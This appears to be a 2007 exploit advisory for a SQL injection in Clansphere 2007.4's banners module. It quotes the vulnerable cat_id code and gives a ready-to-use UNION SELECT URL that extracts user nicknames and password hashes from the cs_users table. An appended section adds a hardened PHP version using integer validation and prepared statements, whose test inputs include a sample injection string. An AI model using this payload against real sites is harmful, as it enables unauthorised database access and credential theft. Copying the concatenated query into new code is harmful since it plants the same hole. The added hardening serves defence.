# Title : Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability
# Published : 2007-09-22
# Author : IHTeam
#########################################################################################
#
# Inclusion Hunter Team
# http://www.ihteam.net
#
#
# [Clansphere 2007.4]
#
#
# Class: SQL Injection
# Found: 22/09/2007
# Remote: Yes
# Site: http://www.clansphere.net/
# Download: http://sourceforge.net/project/showfiles.php?group_id=95430
# Author: R00T[ATI] of IHTeam
# Contact: r00t.ati@ihteam.net - http://www.ihteam.net
#
#########################################################################################
Vulnerable code:
mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
$where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================
Exploit (!!!WORKS ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,null%20FROM%20cs_users/*
===================================================================================================================
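A hardened form of the cat_id handling shown under "Vulnerable code", as an added example that is not Clansphere's code or the advisory author's: cat_id is validated as a positive integer and then bound in a prepared statement instead of being concatenated into the WHERE clause. The cs_banners table, its banners_id and banners_name columns, and the function names are assumptions, and PDO with in-memory SQLite stands in for the application's own database layer.

```php
<?php
// Added example: hardened handling of cat_id. Table name cs_banners and its
// columns other than categories_id are assumptions; the rows are constructed.

/** Return a validated category id, or null if cat_id is absent or not a positive integer. */
function parse_cat_id(array $get): ?int
{
    if (!isset($get['cat_id']) || !is_string($get['cat_id'])) {
        return null;                       // missing, or an array such as cat_id[]=1
    }
    $id = filter_var($get['cat_id'], FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;     // anything but a plain integer is rejected
}

/** Fetch banners for one category; the id is bound, never concatenated into SQL. */
function banners_for_category(PDO $db, int $catId): array
{
    $stmt = $db->prepare(
        'SELECT banners_id, banners_name FROM cs_banners WHERE categories_id = :cat'
    );
    $stmt->bindValue(':cat', $catId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cs_banners (banners_id INTEGER, categories_id INTEGER, banners_name TEXT)');
$db->exec("INSERT INTO cs_banners VALUES (1, 1, 'partner'), (2, 2, 'sponsor')");

// Constructed request values: one legitimate, three that must be refused.
$requests = [
    ['cat_id' => '1'],
    ['cat_id' => "1' OR '1'='1"],
    ['cat_id' => '-1'],
    ['cat_id' => ['1']],
];
foreach ($requests as $get) {
    $id = parse_cat_id($get);
    if ($id === null) {
        echo "rejected: " . json_encode($get['cat_id']) . "\n";
        continue;
    }
    echo "cat_id=$id rows=" . count(banners_for_category($db, $id)) . "\n";
}
```

This does not depend on magic_quotes_gpc, which was removed in PHP 5.4 and was never a substitute for parameter binding.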
Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================
# www.Syue.com [2007-09-22]